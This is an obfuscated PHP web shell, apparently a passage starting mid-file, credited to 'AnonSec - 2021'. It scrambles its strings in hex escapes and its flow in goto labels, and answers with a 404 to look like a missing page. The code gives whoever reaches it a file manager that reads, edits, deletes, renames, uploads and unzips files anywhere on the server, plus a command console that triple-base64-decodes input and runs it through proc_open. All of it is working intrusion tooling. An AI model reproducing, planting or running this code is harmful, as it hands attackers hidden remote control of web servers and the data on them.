"\x2f" . $dir) . "\74\57\164\x64\76\12\x20\x20\x20\x20\74\x74\144\x3e\74\143\145\156\x74\145\x72\76"; if (is_writable($lokasi . "\x2f" . $dir)) { echo "\x3c\146\x6f\156\164\x20\143\157\154\x6f\162\x3d\42\x67\x72\145\x65\x6e\x22\x3e"; } elseif (!is_readable($lokasi . "\57" . $dir)) { echo "\74\x66\x6f\x6e\x74\x20\143\x6f\x6c\x6f\x72\x3d\42\162\x65\x64\42\x3e"; } echo statusnya($lokasi . "\57" . $dir); if (is_writable($lokasi . "\57" . $dir) || !is_readable($lokasi . "\x2f" . $dir)) { echo "\x3c\x2f\146\x6f\156\x74\x3e"; } echo "\x3c\57\x63\145\156\164\x65\x72\76\x3c\57\x74\x64\76\xa\x20\40\40\x20\74\164\144\76\x3c\x63\x65\x6e\164\x65\x72\76\74\x66\x6f\162\155\x20\x6d\145\164\x68\x6f\144\x3d\42\x50\117\x53\x54\42\x20\x61\143\164\151\157\x6e\x3d\42\77\160\x69\154\151\150\x61\x6e\x26\160\x61\164\150\x3d{$lokasi}\x22\76\xa\x20\40\x20\40\74\163\x65\154\x65\x63\164\40\156\141\155\x65\x3d\42\x70\x69\x6c\151\x68\x22\76\xa\x20\x20\x20\40\x3c\157\160\x74\x69\157\156\x20\x76\141\x6c\165\145\x3d\x22\42\x3e\x3c\57\x6f\x70\164\x69\157\x6e\76\12\40\40\40\x20\x3c\x6f\160\x74\151\157\156\40\x76\141\x6c\165\145\75\42\150\x61\160\x75\163\42\x3e\104\x65\154\x65\x74\x65\x3c\x2f\157\x70\x74\151\x6f\x6e\x3e\xa\x20\40\40\40\x3c\x6f\x70\164\x69\157\156\40\x76\141\154\x75\x65\75\x22\x67\x61\x6e\x74\151\x6e\141\x6d\x61\42\x3e\122\x65\156\x61\x6d\x65\74\x2f\x6f\x70\164\x69\x6f\x6e\76\xa\x20\40\x20\40\x3c\57\163\145\154\x65\x63\x74\x3e\xa\x20\40\40\x20\74\x69\156\x70\165\x74\40\164\x79\x70\145\75\42\150\x69\144\144\145\x6e\42\x20\x6e\x61\x6d\145\75\42\164\171\x70\145\42\x20\166\x61\x6c\x75\145\x3d\42\144\151\x72\x22\x3e\xa\x20\x20\x20\40\74\151\156\160\x75\x74\40\164\x79\x70\x65\75\x22\150\151\x64\144\145\156\42\x20\x6e\141\155\145\75\42\156\x61\155\145\42\x20\x76\x61\x6c\165\x65\x3d\42{$dir}\42\76\12\x20\40\x20\x20\74\151\x6e\x70\x75\164\40\164\x79\160\145\x3d\x22\150\x69\x64\144\145\x6e\x22\x20\156\141\155\145\75\42\160\x61\164\150\x22\x20\x76\141\x6c\165\145\75\42{$lokasi}\57{$dir}\x22\x3e\xa\x20\x20\40\x20\74\151\156\x70\165\164\x20\164\x79\160\x65\75\x22\163\x75\x62\155\151\164\x22\40\x63\x6c\141\163\163\75\x22\147\x61\x73\x22\40\166\141\x6c\x75\x65\x3d\x22\x3e\42\x20\x2f\76\12\40\x20\x20\40\74\57\146\x6f\x72\155\76\74\x2f\143\x65\156\x74\x65\x72\x3e\74\x2f\164\x64\x3e\12\40\40\x20\40\x3c\x2f\164\x72\x3e"; } goto yCq2C; HSXRH: function filedate($file) { return date("\x46\x20\144\40\131\40\x67\72\x69\72\x73", filemtime($file)); } goto sVPGH; yCq2C: echo "\74\x74\162\40\143\154\141\163\x73\75\42\x66\x69\x72\x73\164\42\x3e\74\164\144\x3e\x3c\57\x74\144\x3e\74\x74\144\76\74\x2f\164\144\x3e\x3c\164\144\x3e\74\57\164\x64\x3e\74\x74\x64\76\x3c\57\164\144\76\x3c\164\144\x3e\74\x2f\x74\144\x3e\x3c\164\x64\x3e\74\x2f\164\144\x3e\x3c\57\x74\162\76"; goto VGBOg; pNpWp: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "\x2e" || $item === "\56\56") { continue; } $path = $dir . "\57" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto qAmpS; EtbIE: function green($text) { echo "\x3c\143\145\x6e\x74\x65\162\76\x3c\x66\x6f\x6e\164\x20\x63\x6f\x6c\x6f\x72\75\47\x67\x72\x65\145\156\x27\76" . $text . "\74\x2f\x63\145\156\164\x65\162\x3e\x3c\57\x66\x6f\x6e\x74\x3e"; } goto nd8IQ; BF49D: function statusnya($file) { $izin = substr(sprintf("\45\x6f", fileperms($file)), -4); return $izin; } goto pMTRG; BjRZS: if (file_exists("\57\x75\163\162\x2f\142\151\156\x2f\160\171\x74\150\157\156\62")) { echo "\74\x66\x6f\x6e\164\x20\x63\x6f\x6c\157\x72\75\147\x72\145\145\x6e\76\x4f\x4e\x3c\x2f\x66\157\x6e\x74\x3e"; } else { echo "\74\x66\157\x6e\164\40\143\157\x6c\157\162\x3d\x72\145\x64\x3e\x4f\106\106\74\57\146\157\156\164\x3e"; } goto ImT0G; LsxKH: if (isset($_GET["\146\151\x6c\x65\154\157\x63"])) { echo "\x3c\164\162\76\74\164\144\76\x43\x75\162\x72\x65\156\164\40\106\x69\154\145\x20\x3a\40" . $_GET["\x66\x69\x6c\145\154\157\x63"]; echo "\74\57\164\x72\76\74\57\164\144\x3e\x3c\x2f\x74\141\x62\154\x65\76\74\142\162\57\x3e"; echo "\x3c\x70\x72\x65\76" . htmlspecialchars(file_get_contents($_GET["\146\x69\154\145\x6c\157\x63"])) . "\x3c\57\160\162\145\x3e"; author(); } elseif (isset($_GET["\160\x69\x6c\151\x68\x61\156"]) && $_POST["\160\151\x6c\x69\150"] == "\150\141\x70\165\163") { if (is_dir($_POST["\160\141\x74\150"])) { xrmdir($_POST["\x70\x61\164\150"]); if (file_exists($_POST["\x70\x61\x74\150"])) { red("\106\x61\x69\154\x65\144\40\164\157\40\144\x65\x6c\x65\x74\145\40\x44\151\162\145\x63\x74\157\162\x79\40\41"); } else { green("\104\x65\154\145\164\x65\x20\104\x69\162\x65\x63\x74\x6f\x72\x79\40\123\x75\143\143\145\x73\x73\40\41"); } } elseif (is_file($_POST["\x70\141\164\150"])) { @unlink($_POST["\x70\141\164\x68"]); if (file_exists($_POST["\x70\x61\x74\150"])) { red("\x46\141\x69\154\145\x64\40\164\157\x20\104\x65\x6c\x65\164\x65\40\106\x69\154\x65\40\41"); } else { green("\x44\145\154\145\164\145\x20\x46\x69\x6c\x65\40\74\151\x3e" . basename($_POST["\160\141\x74\x68"]) . "\x3c\x2f\x69\76\x20\x53\165\143\143\145\x73\163\x20\x21"); } } } elseif (isset($_GET["\160\151\154\x69\x68\141\x6e"]) && $_POST["\x70\x69\154\x69\150"] == "\147\141\x6e\x74\x69\156\141\155\x61") { if (isset($_POST["\147\x61\x6e\164\x69\x6e"])) { $ren = @rename($_POST["\160\141\164\150"], $_POST["\x6e\x65\167\156\x61\x6d\x65"]); if ($ren == true) { green("\x43\150\x61\156\x67\145\40\116\x61\x6d\x65\x20\123\165\x63\143\x65\163\163\x20\41"); } else { red("\x43\x68\141\x6e\147\x65\40\116\x61\155\145\x20\x46\141\x69\154\x65\144\40\x21"); } } if (empty($_POST["\x6e\x61\x6d\145"])) { $namaawal = $_POST["\156\x65\x77\156\141\x6d\x65"]; } else { $namawal = $_POST["\x6e\x61\x6d\x65"]; } echo "\x3c\x63\145\156\164\x65\x72\x3e" . $_POST["\x70\x61\164\x68"] . "\x3c\x62\x72\x3e"; echo "\x3c\x66\x6f\x72\x6d\40\x6d\145\164\x68\x6f\x64\x3d\42\x70\x6f\163\x74\42\76\12\x20\x20\40\40\x4e\x65\167\40\x4e\x61\x6d\145\x20\72\40\74\x69\x6e\x70\x75\164\40\x6e\x61\155\x65\x3d\x22\x6e\x65\x77\156\141\x6d\x65\42\x20\x74\171\160\145\x3d\x22\164\x65\170\164\42\40\143\x6c\x61\x73\x73\x3d\x22\x75\160\42\40\163\151\172\145\x3d\42\62\60\x22\x20\166\141\x6c\x75\x65\75\x22" . $namaawal . "\42\x20\57\x3e\12\x20\40\40\x20\74\151\x6e\160\x75\164\40\164\171\x70\145\75\x22\x68\x69\144\144\x65\x6e\x22\40\x6e\141\155\x65\x3d\x22\x70\x61\x74\x68\42\40\166\x61\154\165\x65\x3d\x22" . $_POST["\160\x61\164\150"] . "\x22\76\xa\x20\x20\40\x20\x3c\x69\156\160\x75\164\x20\x74\x79\x70\145\x3d\42\x68\151\x64\x64\145\156\x22\x20\x6e\x61\x6d\x65\75\42\x70\151\x6c\x69\x68\x22\40\x76\141\154\x75\145\75\42\147\x61\156\x74\x69\156\141\x6d\141\x22\76\12\x20\x20\x20\x20\x3c\x69\x6e\x70\165\x74\40\164\x79\x70\x65\75\x22\x73\x75\x62\x6d\151\x74\42\x20\x76\x61\154\165\x65\x3d\42\x43\150\141\x6e\x67\145\42\40\x6e\141\x6d\145\x3d\42\147\x61\x6e\164\x69\156\x22\x20\143\154\x61\x73\163\75\x22\165\160\x22\40\x73\x74\171\154\x65\x3d\42\x63\x75\162\x73\x6f\162\72\x20\x70\157\151\156\164\145\x72\73\x20\142\157\x72\x64\x65\162\x2d\143\x6f\154\157\x72\72\40\x23\146\x66\146\x22\x2f\x3e\xa\40\x20\40\40\x3c\x2f\x66\157\x72\x6d\76"; } elseif (isset($_GET["\160\x69\154\x69\x68\x61\156"]) && $_POST["\x70\x69\154\151\150"] == "\145\x64\151\164") { if (isset($_POST["\x67\x61\x73\x65\x64\x69\x74"])) { $edit = @file_put_contents($_POST["\x70\x61\x74\x68"], $_POST["\163\162\x63"]); if ($edit == true) { green("\105\x64\x69\x74\40\106\151\154\145\40\x53\165\x63\143\145\x73\163\40\41"); } else { red("\105\144\151\164\40\x46\151\154\145\x20\106\x61\151\154\145\144\x20\x21"); } } echo "\74\x63\x65\x6e\x74\x65\162\76" . $_POST["\160\141\164\150"] . "\74\x62\x72\76\x3c\142\x72\76"; echo "\74\x66\157\162\x6d\40\155\145\164\150\157\144\75\x22\x70\x6f\x73\164\42\x3e\xa\40\x20\40\x20\x3c\x74\145\x78\x74\x61\162\145\x61\40\x63\157\154\163\75\x38\x30\x20\162\157\x77\x73\75\62\60\40\x6e\x61\x6d\x65\75\x22\163\x72\x63\x22\x3e" . htmlspecialchars(file_get_contents($_POST["\160\x61\164\x68"])) . "\74\x2f\164\145\x78\164\x61\x72\x65\x61\76\74\142\162\76\12\x20\40\x20\40\74\151\x6e\x70\x75\x74\x20\164\171\160\x65\75\x22\x68\151\x64\144\145\x6e\42\40\x6e\141\155\145\75\x22\160\x61\164\x68\42\x20\166\x61\154\x75\145\x3d\x22" . $_POST["\160\141\164\x68"] . "\x22\x3e\xa\x20\x20\x20\x20\x3c\151\x6e\160\165\x74\x20\x74\171\x70\145\75\x22\x68\151\144\144\x65\156\x22\x20\156\141\155\x65\x3d\x22\x70\151\154\151\150\42\40\166\x61\x6c\165\x65\x3d\x22\x65\144\x69\x74\x22\x3e\xa\x20\x20\40\x20\x3c\x69\x6e\160\165\x74\40\164\171\x70\145\75\x22\163\x75\142\x6d\x69\x74\42\40\x76\x61\x6c\165\x65\75\x22\105\144\151\164\x20\106\151\154\145\42\40\x6e\x61\155\x65\x3d\x22\147\141\163\145\144\151\x74\x22\40\x2f\x3e\xa\40\40\x20\x20\x3c\x2f\146\x6f\x72\155\x3e\74\142\162\76"; } elseif (isset($_GET["\x70\x69\154\x69\150\x61\x6e"]) && $_POST["\160\151\154\x69\x68"] == "\144\x75\x6e\x6c\x75\x74") { dunlut($_POST["\x70\x61\164\x68"]); } elseif (isset($_GET["\160\x69\x6c\x69\150\141\x6e"]) && $_POST["\160\151\x6c\x69\150"] == "\x75\156\x7a\x69\x70") { unzip($_POST["\160\x61\164\150"], $lokasi); } elseif ($_REQUEST["\165\160\154\157\x61\144"] == "\147\x61\163\x6b\141\x6e") { echo "\x3c\143\145\156\164\145\162\x3e\125\x70\154\x6f\141\144\x20\x46\151\x6c\145\x20\72\40"; echo "\74\146\x6f\162\x6d\40\145\156\143\164\x79\160\145\x3d\42\155\x75\154\164\x69\x70\141\162\164\x2f\146\x6f\x72\x6d\55\144\x61\164\x61\x22\40\x6d\x65\x74\150\157\144\x3d\42\160\157\x73\x74\x22\76\xa\x3c\151\x6e\160\x75\x74\40\x74\x79\160\x65\x3d\42\162\141\144\151\x6f\x22\x20\x76\x61\x6c\x75\x65\x3d\42\x31\42\40\x6e\x61\x6d\145\75\42\144\151\x72\x6e\171\141\x22\x20\x63\x68\145\143\153\145\x64\76\x63\165\162\x72\145\x6e\164\x5f\144\x69\x72\x20\x5b\x20" . cekdir() . "\x20\x5d\xa\74\151\156\160\x75\x74\x20\164\171\x70\145\x3d\42\x72\x61\x64\151\157\42\x20\x76\141\154\165\x65\x3d\x22\x32\42\40\x6e\x61\x6d\145\75\x22\144\151\162\x6e\171\x61\x22\x20\76\x64\x6f\143\x75\155\145\156\x74\x5f\x72\x6f\157\164\40\133\x20" . cekroot() . "\x20\x5d\xa\74\142\162\x3e\xa\74\x69\x6e\160\x75\164\40\164\171\x70\x65\75\42\x68\x69\x64\144\145\156\42\x20\x6e\141\x6d\145\x3d\x22\165\160\167\153\167\153\42\x20\166\x61\154\165\x65\x3d\42\x61\160\x6c\157\144\x22\x3e\xa\x3c\151\x6e\x70\165\x74\x20\x74\171\x70\x65\75\42\146\151\154\145\x22\40\x6e\141\155\x65\75\42\x62\x65\162\153\141\x73\x22\x3e\x3c\151\156\160\165\x74\40\164\x79\x70\x65\x3d\42\x73\165\142\x6d\151\x74\x22\40\156\141\155\x65\75\42\x62\x65\x72\x6b\141\163\x6e\171\141\42\40\166\141\154\x75\x65\75\42\125\160\154\157\141\144\42\x20\x63\x6c\x61\163\163\75\x22\x75\x70\x22\40\163\164\x79\x6c\145\75\x22\143\165\x72\163\157\162\72\40\160\157\x69\156\164\x65\x72\73\x20\142\x6f\x72\144\x65\162\x2d\143\157\x6c\157\x72\72\40\x23\x66\x66\146\x22\76\x3c\142\162\76\x3c\x62\x72\76\xa\x55\160\154\x6f\141\144\40\106\151\x6c\x65\40\x46\162\157\155\40\x4c\151\156\x6b\40\x3a\x3c\142\162\76\xa\74\x69\156\x70\x75\x74\40\x74\171\160\x65\x3d\x22\x74\145\x78\164\x22\x20\156\141\x6d\145\x3d\x22\x64\x61\x72\x69\x6c\x69\156\x6b\42\x20\x63\154\141\163\163\75\42\x75\160\42\40\x70\x6c\141\143\145\x68\x6f\154\144\145\x72\75\x22\150\164\x74\x70\x73\72\x2f\57\x61\156\157\x6e\67\56\170\171\x7a\x2f\165\x70\x6c\157\141\x64\x2e\x74\170\164\x22\76\46\156\x62\x73\160\x3b\x3c\x69\156\x70\165\x74\40\x74\x79\x70\145\x3d\x22\x74\145\x78\x74\x22\x20\156\x61\155\145\75\42\156\141\155\x61\x6c\151\156\153\x22\x20\143\x6c\141\163\x73\75\42\165\x70\x22\40\x73\x69\x7a\x65\75\x22\x33\x22\x20\x70\x6c\141\143\145\150\157\154\144\x65\x72\75\x22\146\151\x6c\145\56\x74\170\164\x22\76\x3c\x69\x6e\x70\165\x74\x20\x74\x79\160\x65\x3d\42\x73\165\x62\x6d\x69\x74\x22\x20\156\x61\155\x65\75\42\x6c\x69\156\153\x6e\x79\141\x22\40\143\x6c\141\163\x73\75\x22\165\x70\42\40\166\x61\x6c\165\145\x3d\42\x55\160\x6c\x6f\x61\144\42\40\163\164\171\x6c\x65\75\x22\x63\165\162\163\157\162\72\40\160\157\151\x6e\x74\145\x72\x3b\x20\x62\x6f\162\144\145\x72\x2d\x63\x6f\154\x6f\162\x3a\x20\43\146\x66\x66\x22\76\xa\x3c\x62\162\x3e\74\142\x72\x3e\64\60\63\40\x55\x70\x6c\x6f\x61\144\40\106\x69\x6c\x65\x3c\x62\162\76\12\x3c\x69\x6e\160\x75\164\40\164\171\160\x65\75\42\x66\151\x6c\145\x22\40\151\x64\x3d\42\144\141\x74\141\156\171\x61\42\x20\x6f\156\x63\150\x61\156\147\145\75\x22\163\x65\164\x66\x69\154\145\x6e\141\x6d\x65\x28\164\150\151\163\56\x76\x61\154\165\145\51\73\x20\154\157\x61\144\106\151\154\145\x28\164\150\x69\x73\x2e\146\x69\154\145\x73\x5b\x30\x5d\51\x22\57\76\xa\74\x69\x6e\160\x75\x74\x20\164\x79\160\145\x3d\42\x68\151\144\x64\x65\156\x22\40\x6e\141\x6d\145\75\42\142\145\x70\141\163\x6e\141\155\x61\x22\40\151\x64\75\42\156\141\x6d\141\x6e\171\141\42\x3e\xa\x3c\164\x65\170\x74\141\x72\x65\141\x20\x73\x74\171\154\145\75\42\x64\x69\163\x70\x6c\x61\171\x3a\x20\x6e\x6f\156\145\42\x20\151\x64\x3d\42\x62\x65\160\141\163\144\141\x74\x61\x22\40\156\141\x6d\145\x3d\x22\x62\x65\160\141\163\144\141\164\141\42\x3e\74\57\164\x65\x78\x74\141\x72\145\x61\x3e\xa\74\x69\156\160\x75\x74\x20\x74\171\x70\145\75\42\x73\165\x62\155\151\x74\42\x20\156\x61\x6d\145\x3d\x22\142\x65\x70\141\163\42\x20\x76\x61\x6c\x75\x65\75\42\x55\x70\154\x6f\x61\x64\x22\x20\143\x6c\141\x73\163\75\x22\165\160\x22\x20\163\164\171\x6c\145\75\42\143\165\162\163\x6f\162\72\x20\160\157\151\x6e\x74\145\162\x3b\x20\x62\157\162\x64\x65\x72\x2d\x63\157\154\x6f\162\x3a\40\x23\146\x66\x66\42\76\12\x3c\57\146\x6f\x72\x6d\x3e\x3c\142\162\x3e\74\x62\162\x3e\74\57\x63\145\156\x74\145\x72\76"; } elseif ($_GET["\153\157\155\145\x6e\x64"] == "\x67\x61\163\153\141\x6e") { echo "\74\x63\145\156\x74\145\162\76"; echo "\74\x66\x6f\162\155\x20\155\x65\x74\150\157\144\75\x22\x70\x6f\163\164\x22\40\x6f\x6e\163\x75\x62\155\x69\164\x3d\42\144\x6f\143\x75\155\x65\x6e\x74\x2e\147\145\x74\x45\x6c\x65\155\x65\156\164\102\171\111\x64\50\x27\153\x6f\155\145\x6e\x64\156\171\141\x27\51\x2e\x76\141\x6c\x75\145\40\75\40\x62\x74\157\141\50\x62\x74\157\141\50\142\x74\157\141\x28\x64\x6f\x63\165\x6d\x65\x6e\x74\x2e\x67\145\164\105\154\145\155\145\156\x74\102\x79\x49\144\50\x27\153\157\x6d\145\156\144\x6e\x79\141\x27\x29\56\166\141\x6c\165\x65\x29\x29\x29\42\x3e\12\x20\x20\40\x20" . @get_current_user() . "\100" . ipserv() . "\x3a\x7e\40\x24\x20\x3c\x69\156\x70\165\x74\40\x74\x79\x70\x65\75\x22\x74\x65\170\x74\42\40\156\141\x6d\145\75\42\153\x6f\x6d\145\x6e\144\x22\40\x69\144\x3d\42\153\157\155\x65\156\x64\x6e\171\x61\x22\x20\x73\164\x79\154\x65\75\42\142\141\143\153\x67\x72\x6f\x75\x6e\x64\55\x63\157\154\157\x72\x3a\x20\x23\61\x66\61\146\x31\x66\73\40\143\157\x6c\x6f\x72\72\x20\43\146\146\146\x22\76\xa\40\x20\40\x20\74\151\x6e\x70\165\164\40\x74\171\160\x65\75\42\163\x75\x62\155\151\164\x22\x20\156\x61\155\x65\x3d\42\145\x6b\163\x65\153\157\155\145\156\144\42\x20\x76\x61\154\165\145\x3d\x22\x20\76\76\40\x22\40\x63\x6c\x61\163\163\x3d\42\165\160\42\x20\163\x74\171\x6c\145\x3d\x22\x63\x75\162\163\157\x72\72\40\160\x6f\x69\x6e\x74\145\162\x3b\40\142\x6f\162\144\x65\x72\55\143\x6f\154\x6f\x72\72\x20\x23\146\x66\146\42\76\12\40\40\40\x20\74\x2f\146\157\162\x6d\76\74\x62\x72\76"; if (isset($_POST["\x65\x6b\x73\145\x6b\157\155\145\156\x64"])) { ekse($_POST["\153\157\x6d\x65\x6e\x64"], $lokasi); } echo "\74\x2f\x63\x65\x6e\x74\x65\162\x3e"; } goto Bk0N6; N9YPv: author(); goto BF49D; AYKIq: echo "\x3c\x64\151\166\x20\x69\x64\75\x22\x63\x6f\156\164\x65\156\x74\x22\76\x3c\164\x61\142\x6c\x65\x20\167\x69\x64\x74\150\75\x22\x31\60\60\45\x22\40\142\x6f\x72\x64\x65\162\x3d\x22\x30\x22\40\x63\145\154\x6c\x70\x61\x64\144\x69\x6e\x67\75\42\63\42\x20\143\x65\x6c\x6c\163\160\141\x63\151\x6e\x67\75\42\61\x22\x20\x61\x6c\x69\147\x6e\x3d\42\x63\145\x6e\164\145\x72\42\x3e\xa\74\x74\x72\40\x63\x6c\141\x73\163\x3d\x22\x66\151\x72\x73\x74\x22\76\xa\74\164\x64\76\74\x63\145\156\164\145\x72\x3e\116\x61\155\x65\x3c\x2f\143\x65\156\x74\x65\162\76\74\57\164\x64\x3e\12\x3c\164\144\76\74\x63\145\x6e\164\145\x72\76\x53\151\172\x65\74\x2f\143\145\156\164\x65\162\x3e\74\x2f\x74\x64\x3e\12\x3c\x74\x64\x3e\74\143\x65\x6e\x74\145\162\76\x4c\x61\163\164\x20\115\x6f\x64\x69\x66\x69\x65\144\74\57\x63\x65\156\x74\x65\x72\76\x3c\57\164\144\76\xa\74\x74\144\x3e\74\143\145\156\164\x65\162\76\x4f\x77\156\x65\162\74\57\x63\x65\x6e\164\145\x72\x3e\74\57\x74\x64\x3e\12\x3c\x74\x64\x3e\74\x63\x65\156\164\145\x72\76\120\x65\162\155\x69\x73\x73\x69\157\156\x73\x3c\57\x63\145\156\164\x65\162\x3e\74\x2f\164\x64\x3e\xa\x3c\x74\x64\x3e\74\143\x65\x6e\164\145\162\76\117\160\164\151\x6f\x6e\x73\x3c\x2f\x63\145\156\164\145\x72\76\74\57\x74\144\76\12\x3c\x2f\164\162\76"; goto cKckn; IMRfC: function VEsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto ueeLG; o_VxR: echo "\74\x2f\x74\162\x3e\74\x2f\164\x64\x3e\x3c\57\x74\x61\x62\x6c\x65\76\x3c\57\x74\141\x62\154\x65\76"; goto N9YPv; SBmAI: $lokasi = str_replace("\x5c", "\57", $lokasi); goto XRrvQ; JF3zr: echo "\x20\46\x6e\x62\x73\160\73\x7c\46\156\142\163\160\x3b\x20\x63\x55\122\114\x20\x3a\40"; goto sdIcB; E1TvY: echo "\115\171\x53\121\114\40\72\x20"; goto Yap8Y; U1usa: @set_time_limit(0); goto gwiYP; ZxXnd: if (isset($_GET["\x70\141\x74\150"])) { $lokasi = $_GET["\x70\141\x74\150"]; $lokdua = $_GET["\x70\x61\164\x68"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto SBmAI; Bk53R: echo "\x3c\164\x68\76\x5b\x20\x26\156\x62\x73\x70\x3b\x3c\x61\x20\x68\x72\x65\146\x3d\42\77\160\x61\x74\x68\x3d" . $lokasi . "\x26\153\157\x6d\145\x6e\x64\x3d\147\x61\163\x6b\141\156\x22\x3e\x43\x30\155\x6d\141\x6e\x64\74\x2f\141\x3e\46\x6e\142\x73\x70\73\x20\135\x3c\57\164\150\76"; goto CRQ2u; NYuaR: function author() { echo "\74\143\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\76\x41\x6e\157\x6e\123\145\143\40\x2d\x20\x32\x30\62\x31\x3c\x2f\143\x65\156\x74\145\162\76"; die; } goto EToKr; JGaJH: function ipserv() { if (empty($_SERVER["\123\105\122\126\105\x52\137\101\104\x44\x52"])) { return gethostbyname($_SERVER["\123\105\x52\126\105\122\x5f\116\x41\x4d\x45"]); if (empty(gethostbyname($_SERVER["\x53\x45\122\126\x45\x52\x5f\116\101\115\105"]))) { return $_SERVER["\123\105\x52\126\x45\x52\x5f\116\101\115\x45"]; } } else { return $_SERVER["\123\105\x52\126\x45\122\x5f\x41\x44\104\122"]; } } goto omm8j; n3Vz3: function owner($file) { if (function_exists("\x70\157\163\x69\170\x5f\147\x65\x74\x70\167\x75\151\x64")) { $tod = @posix_getpwuid(fileowner($file)); return "\x3c\x63\x65\156\x74\x65\162\x3e" . $tod["\x6e\141\155\145"] . "\x3c\x2f\x63\x65\156\x74\145\162\76"; } else { return "\x3c\x63\x65\x6e\x74\x65\x72\76" . fileowner($file) . "\74\x2f\x63\145\156\164\145\x72\76"; } } goto k2cWF; AUSDi: echo "\x57\145\142\x20\123\145\162\x76\x65\x72\40\72\40\74\x66\157\156\x74\40\143\x6f\x6c\157\x72\75\x27\147\x6f\x6c\x64\x27\76" . $_SERVER["\x53\105\122\x56\105\x52\137\x53\x4f\x46\124\127\x41\x52\105"] . "\x3c\x2f\x66\157\x6e\164\x3e\x3c\x62\162\x3e"; goto kMFHF; vTTMe: $lokasinya = @scandir($lokasi); goto USeK6; v1HDY: echo "\40\x26\x6e\x62\x73\x70\73\x7c\46\x6e\x62\163\160\73\x20\x50\x65\x72\154\40\72\40"; goto jxd93; EToKr: function cekdir() { if (isset($_GET["\160\141\x74\150"])) { $lokasi = $_GET["\160\x61\x74\x68"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "\x3c\x66\157\x6e\164\40\143\157\154\157\162\x3d\x27\147\x72\145\145\x6e\47\76\x57\x72\x69\164\145\141\x62\154\x65\x3c\x2f\146\x6f\156\164\x3e"; } else { return "\x3c\x66\157\156\x74\x20\x63\157\154\x6f\x72\75\47\x72\145\144\47\76\x57\x72\x69\x74\145\x61\x62\x6c\x65\74\x2f\146\157\156\164\x3e"; } } goto ZeZ3O; NYlz9: $disfunc = @ini_get("\x64\151\163\141\x62\154\145\x5f\x66\165\156\143\164\151\x6f\156\x73"); goto dDAb5; omm8j: function cekfile($file) { return "\74\x69\40\x63\154\141\163\x73\x3d\42\146\141\40\x66\141\55\x66\x69\154\x65\42\x20\x73\x74\x79\154\x65\x3d\42\x63\157\x6c\157\x72\72\x20\x23\x64\66\144\64\143\x65\x22\76\74\57\x69\x3e\x20"; } goto HSXRH; Bk0N6: if (!is_readable($lokasi)) { die("\x3c\143\x65\x6e\164\145\x72\x3e\124\x68\x69\x73\x20\x64\x69\x72\145\x63\x74\157\x72\171\40\151\x73\x20\x75\156\162\x65\x61\x64\141\x62\x6c\x65\40\x3a\50\x3c\x2f\143\x65\156\164\x65\x72\x3e"); } goto AYKIq; mslau: echo "\x53\x65\162\x76\145\162\x20\x49\x50\40\x3a\x20\74\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\x72\75\x67\157\154\144\x3e" . ipserv() . "\x3c\x2f\146\157\156\164\x3e\x20\46\156\x62\x73\160\73\57\x26\x6e\142\163\160\73\40\131\x6f\165\162\40\111\x50\x20\72\x20\74\x66\x6f\156\164\x20\143\x6f\154\x6f\162\75\x67\x6f\x6c\144\76" . $_SERVER["\122\105\x4d\x4f\x54\105\x5f\101\x44\104\122"] . "\x3c\x2f\146\x6f\156\x74\76\74\142\x72\x3e"; goto AUSDi; vDWV5: echo "\74\164\x68\x3e\133\x20\46\156\142\163\160\x3b\x3c\141\40\x68\x72\x65\x66\75\x22" . $_SERVER["\x53\103\122\111\120\x54\x5f\x4e\x41\115\105"] . "\x22\x3e\x48\x6f\155\145\x3c\57\x61\x3e\x26\156\x62\163\x70\73\40\x5d\74\x2f\164\150\x3e"; goto Bk53R; Aq6u5: @http_response_code(404); goto NYlz9; ldDFm: if (file_exists("\57\x75\x73\162\x2f\142\151\x6e\x2f\x77\147\145\164")) { echo "\x3c\x66\x6f\156\x74\x20\143\157\x6c\157\162\x3d\147\162\145\145\x6e\x3e\x4f\x4e\x3c\x2f\x66\157\156\x74\x3e"; } else { echo "\x3c\x66\157\x6e\x74\40\143\x6f\x6c\157\x72\x3d\162\145\x64\76\x4f\x46\x46\74\57\146\157\x6e\164\x3e"; } goto v1HDY; sVPGH: function unzip($file, $lokasi) { if (!is_readable($file)) { red("\x43\x61\x6e\156\157\x74\40\125\156\x7a\x69\x70\x20\106\x69\154\145\40\x2f\40\125\156\162\145\x61\x64\x61\142\x6c\x65\40\106\x69\x6c\x65\40\x21"); die; } elseif (strpos(file_get_contents($file), "\x50\113\3\x4") === false) { red("\x54\150\x69\163\40\x69\x73\x6e\x27\x74\x20\x5a\151\160\x20\106\x69\x6c\x65\40\41"); die; } $zip = new ZipArchive(); $res = $zip->open($file); if ($res == true) { $zip->extractTo($lokasi); $zip->close(); green("\x53\x75\143\x63\145\x73\x73\40\125\156\x7a\x69\160\40\106\151\154\x65\x20\41"); } else { red("\x46\141\151\x6c\x65\x64\x20\x74\x6f\x20\125\x6e\172\151\x70\x20\106\151\x6c\145\40\x21"); } } goto EtbIE; uVFpZ: echo "\x3c\57\164\x61\142\x6c\x65\76\74\142\x72\x3e"; goto CUJtY; EJnsN: function ekse($komend, $lokasi) { if (!function_exists("\160\x72\157\143\137\x6f\160\145\156")) { die("\x70\x72\157\143\x5f\157\160\x65\x6e\x20\146\x75\x6e\x63\164\x69\157\x6e\x20\144\151\x73\x61\x62\154\x65\144\x20\x21"); } elseif (!function_exists("\x62\141\x73\x65\x36\64\x5f\x64\x65\x63\157\x64\145")) { die("\x62\141\x73\x65\66\x34\137\144\145\x63\x6f\144\145\40\x66\x75\x6e\143\x74\x69\x6f\156\x20\x64\151\163\x61\x62\x6c\145\x64\x20\41"); } $komen = base64_decode(base64_decode(base64_decode($komend))); $tod = @proc_open($komen, array(0 => array("\x70\151\160\145", "\162"), 1 => array("\x70\x69\x70\145", "\167"), 2 => array("\160\x69\160\x65", "\x72")), $pipes, $lokasi); echo "\x3c\x74\x65\x78\x74\x61\x72\145\x61\40\x72\x6f\x77\163\x3d\x27\x32\65\47\x20\x63\x6f\x6c\163\x3d\x27\61\x30\60\x27\x3e" . htmlspecialchars(stream_get_contents($pipes[1])) . "\x3c\x2f\x74\x65\x78\164\141\162\145\x61\x3e\74\x62\x72\x3e\74\x62\x72\76"; } goto JGaJH; 